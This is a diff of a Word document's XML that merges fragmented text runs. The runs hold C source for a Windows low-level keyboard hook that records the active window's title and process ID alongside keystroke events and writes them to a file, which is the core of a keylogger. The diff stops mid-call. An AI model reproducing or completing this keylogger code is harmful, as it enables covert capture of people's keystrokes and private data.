-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> == HC_ACTION &amp;&amp; (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> == WM_KEYDOWN || </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> == WM_SYSKEYDOWN))</w:t>
+        <w:t>if (nCode == HC_ACTION &amp;&amp; (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4401,47 +3321,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t>KBDLLHOOKSTRUCT *</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = (KBDLLHOOKSTRUCT*) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>lParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
+        <w:t>KBDLLHOOKSTRUCT *ks = (KBDLLHOOKSTRUCT*) lParam;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4476,27 +3356,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">SYSTEMTIME </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>st</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
+        <w:t>SYSTEMTIME st;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4531,38 +3391,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">CHAR </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>MAX_MODULE_NAME];</w:t>
+        <w:t>CHAR moduleName[MAX_MODULE_NAME];</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4597,27 +3426,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">DWORD </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>winID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = NULL;</w:t>
+        <w:t>DWORD winID = NULL;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4652,58 +3461,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">HWND </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>activeWindow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GetForegroundWindow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t>HWND activeWindow = GetForegroundWindow();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4738,68 +3496,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GetWindowThreadProcessId</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>activeWindow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>, &amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>winID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t>GetWindowThreadProcessId(activeWindow, &amp;winID);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4834,68 +3531,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GetWindowText</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>activeWindow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>, MAX_MODULE_NAME);</w:t>
+        <w:t>GetWindowText(activeWindow, moduleName, MAX_MODULE_NAME);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4930,126 +3566,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>winID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> != </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>prevWinID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> || </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strcmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>prevModuleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>))</w:t>
+        <w:t>if (winID != prevWinID || strcmp(moduleName, prevModuleName))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5128,48 +3645,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>prevWinID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>winID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
+        <w:t>prevWinID = winID;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5213,68 +3689,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strcpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>prevModuleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t>strcpy(prevModuleName, moduleName);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5318,108 +3733,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sprintf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strlen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">), " : %d", </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>winID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t>sprintf(moduleName + strlen(moduleName), " : %d", winID);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5463,48 +3777,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>, "\r\n");</w:t>
+        <w:t>strcat(moduleName, "\r\n");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5548,97 +3821,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WriteFile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strlen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
